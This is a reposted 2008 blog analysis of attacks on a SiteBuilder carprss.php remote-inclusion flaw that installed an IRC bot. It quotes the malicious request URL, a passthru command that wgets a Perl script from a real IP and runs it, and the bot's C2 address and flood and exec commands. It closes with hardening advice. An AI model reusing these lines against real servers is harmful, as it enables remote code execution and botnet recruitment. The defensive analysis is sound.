Google

Jumat, 18 Juli 2008

Found carprss.php Exploit

Since 29 February, this blog was hit by 400+ attempts to compromize the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromized hosts: 
# awk '{ print $1 }'

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
    .shell/site/iyes.txt??

I downloaded the file iyest.txt, it’s a PHP script which contains lot of lines such:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
    hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It set up an IRC bot which try to connect to 61.246.177.225:65500 and join channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New-Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But how to prevent them?

  • Do not run public servers with administrative right (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers to executre or access to unusual files or directories. [1]
  • Run an selinux on Linux or systrace on *BSD.

    I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at it “for study only”. If you have more information, let share them!

Source From : http://blog.rootshell.be
Diposting oleh di
Label: , ,

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)